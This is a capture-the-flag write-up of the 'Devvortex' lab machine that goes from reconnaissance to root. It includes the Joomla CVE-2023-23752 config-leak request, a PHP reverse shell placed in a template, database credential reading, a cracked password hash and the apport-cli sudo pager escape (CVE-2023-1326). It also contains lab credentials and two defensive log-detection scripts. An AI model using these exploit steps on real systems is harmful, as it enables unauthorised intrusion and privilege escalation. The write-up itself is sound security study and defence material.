This post walks through a penetration test of a Linux machine named "Devvortex". An Nmap scan finds open SSH and HTTP ports; FFUF is then used for virtual-host and directory discovery. A Joomla administrator login page turns up, and CVE-2023-23752 is used to obtain the administrator credentials. Adding a PHP reverse shell to a template file gives a foothold, from which the MySQL database credentials are read and a user's password hash is cracked to obtain a second user's credentials. Finally, that user may run apport-cli via sudo, and CVE-2023-1326 is used to obtain root. The post summarises the key steps and the vulnerabilities used.
Information Gathering
# Nmap 7.98 scan initiated Sat Dec 27 09:08:15 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 15.115 days (since Fri Dec 12 06:22:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 09:08:31 2025 -- 1 IP address (1 host up) scanned in 15.48 seconds
Vulnerability Analysis
Since all of the pages are static, look for virtual hosts
➜ Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]
Opening dev.devvortex.htb, it is static as well, so look for subdirectories
➜ Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
http://dev.devvortex.htb/administrator/ gives the Joomla Administrator Login; searching turns up CVE-2023-23752
The version file path can be found in the GitHub repository: https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml reports version 4.2.6, so CVE-2023-23752 applies
Exploitation (User Flag)
➜ Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq
This gives the credentials lewis:P4ntherg0t1n5r3c0n##
In System > Site Templates > Cassiopeia Details and Files > error.php, add a PHP reverse shell
ss -tlpn shows 3306 and 33060 listening, i.e. MySQL
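As an added detection example (not code from the original writeup), the Python below parses nginx combined-format access log lines and flags requests that match the CVE-2023-23752 pattern used above: a GET to /api/index.php/v1/config/application?public=true answered with 200, which is the Joomla 4 web-services endpoint leaking the database credentials. It also tags reads of administrator/manifests/files/joomla.xml as version fingerprinting. The log lines, IPs and sizes are constructed; the set of monitored routes is an assumption that a defender would extend to other /api/ endpoints. The actual fix is upgrading Joomla to 4.2.8 or later.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample nginx access log lines (combined format). IPs, sizes and
# user agents are made up for this example.
SAMPLE_LOG = """\
10.10.14.5 - - [27/Dec/2025:09:10:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2310 "-" "curl/8.4.0"
192.168.1.20 - - [27/Dec/2025:09:11:30 +0000] "GET /home HTTP/1.1" 200 23221 "-" "Mozilla/5.0"
10.10.14.5 - - [27/Dec/2025:09:12:00 +0000] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 3111 "-" "curl/8.4.0"
172.16.0.9 - - [27/Dec/2025:09:12:10 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 100 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Assumption: the config endpoint is the one the writeup shows; a real rule set
# would cover the other /api/index.php/v1/ routes as well.
CONFIG_ROUTE = "/api/index.php/v1/config/application"
VERSION_FILE = "/administrator/manifests/files/joomla.xml"


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["path"])
    entry["route"] = parts.path
    entry["query"] = parse_qs(parts.query)
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return an alert tag for a parsed entry, or None if it is benign."""
    route, query, status = entry["route"], entry["query"], entry["status"]
    if route.startswith(CONFIG_ROUTE) and status == 200:
        # public=true is what makes the endpoint answer without authentication
        if query.get("public") == ["true"]:
            return "config-disclosure"
        return "config-api-access"
    if route == VERSION_FILE and status == 200:
        return "version-fingerprint"
    return None


def detect(log_text):
    """Run classify() over every line and return (ip, tag, route) tuples for hits."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tag = classify(entry)
        if tag:
            alerts.append((entry["ip"], tag, entry["route"]))
    return alerts


if __name__ == "__main__":
    for ip, tag, route in detect(SAMPLE_LOG):
        print(f"{tag:<20} {ip:<15} {route}")
```

The 401 on the last sample line is what a patched Joomla returns for the same route without a session, so that request is not flagged; only the 200 with public=true is treated as disclosure.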
www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';
Log into the database with mysql -u lewis -p
Enumerating the database gives
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
Cracking the hash gives the credentials logan:tequieromucho
Privilege Escalation (Root Flag)
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11
Searching turns up CVE-2023-1326
logan@devvortex:~$ sudo /usr/bin/apport-cli -f
# enter 2
# enter 1 or any value
# enter V
# enter !/bin/bash
This gives a root shell
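As an added detection example (not part of the original writeup), the Python below parses sudo's entries in /var/log/auth.log and flags the pattern used above: a user running apport-cli as root via sudo in one of its interactive modes, which on a vulnerable version (2.20.11 here) opens the report in a pager that can spawn a shell. The log lines are constructed; the set of flags treated as interactive is an assumption based on the -f mode shown above and the --crash-file mode that also views a report. Denied attempts ("user NOT in sudoers") are parsed but not counted.

```python
import re

# Constructed sample auth.log lines in the format sudo writes. Host, users,
# timestamps and paths are made up for this example.
SAMPLE_AUTH_LOG = """\
Dec 27 09:20:01 devvortex sudo:    logan : TTY=pts/0 ; PWD=/home/logan ; USER=root ; COMMAND=/usr/bin/apport-cli -v
Dec 27 09:20:15 devvortex sudo:    logan : TTY=pts/0 ; PWD=/home/logan ; USER=root ; COMMAND=/usr/bin/apport-cli -f
Dec 27 09:21:02 devvortex sudo:    logan : TTY=pts/0 ; PWD=/home/logan ; USER=root ; COMMAND=/usr/bin/apport-cli -c /var/crash/_usr_bin_example.0.crash
Dec 27 09:25:40 devvortex sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
Dec 27 09:26:00 devvortex sudo:    logan : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/logan ; USER=root ; COMMAND=/bin/bash
"""

# sudo log line: "<ts> <host> sudo: <user> : [<denial> ;] TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+(?P<user>\S+) : '
    r'(?:(?P<denied>[^;]*NOT in sudoers[^;]*) ; )?'
    r'TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$'
)

# Assumption: these apport-cli modes open a report in a pager on a TTY; -v only
# prints the version and is harmless.
INTERACTIVE_FLAGS = {"-f", "--file-bug", "-c", "--crash-file"}


def parse_sudo_line(line):
    """Parse one sudo log line into a dict, or return None if it does not match."""
    m = SUDO_RE.match(line)
    return m.groupdict() if m else None


def is_risky(entry):
    """True when an allowed sudo run invokes apport-cli as root in an interactive mode."""
    if entry is None or entry["denied"]:
        return False
    argv = entry["cmd"].split()
    if not argv or not argv[0].endswith("/apport-cli"):
        return False
    return entry["runas"] == "root" and any(a in INTERACTIVE_FLAGS for a in argv[1:])


def scan(log_text):
    """Return (timestamp, user, tty, command) for every risky sudo entry."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_sudo_line(line)
        if is_risky(entry):
            hits.append((entry["ts"], entry["user"], entry["tty"], entry["cmd"]))
    return hits


if __name__ == "__main__":
    for ts, user, tty, cmd in scan(SAMPLE_AUTH_LOG):
        print(f"{ts} {user} on {tty}: sudo {cmd}")
```

The rule deliberately keys on the sudo entry rather than on the shell that follows it, because the pager-spawned /bin/bash does not go through sudo and leaves no further entry there; pairing this with a process-ancestry rule (a shell whose parent is a pager under apport-cli) would close that gap. The durable fix is removing the apport-cli sudo rule for the user and patching apport.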